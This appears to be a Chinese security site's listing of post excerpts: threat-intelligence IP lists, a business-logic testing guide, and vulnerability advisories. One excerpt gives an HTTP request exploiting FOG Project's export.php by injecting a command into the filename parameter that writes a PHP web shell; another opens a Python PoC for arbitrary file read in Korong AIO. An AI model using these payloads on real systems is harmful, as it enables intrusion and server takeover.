秃兔
【2025你懂的】第四期情报 IP
移动端如显示不完整请使用电脑查看 IP类别地理位置103.125.146.79境外威胁IP日本 东京都 东京39.102.213.187蜜罐陷阱IP中国 北京104.247.197.206境外威胁IP美国 加利福尼亚州 埃尔塞贡多103.163...
【2025你懂的】第三十二期情报 威胁情报IP
IP类别地理位置89.117.144.57境外威胁IP美国 密苏里州 圣路易斯103.125.146.85境外威胁IP日本 东京都 东京103.125.146.27境外威胁IP日本 东京都 东京103.125.146.22境外威胁IP日本 东京都 东京1...
【渗透文库】账户暂停/恢复场景业务逻辑测试
测试描述:通过抓包工具分析账户暂停/恢复场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 ...
fogproject系统接口export.php存在远程命令执行漏洞
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
科荣 AIO 管理系统任意文件读取
import base64import requests def poc(ip, file_path): # 构造URL地址url = f’http://{ip}/UtilServlet’headers = { 登录可见余下内容
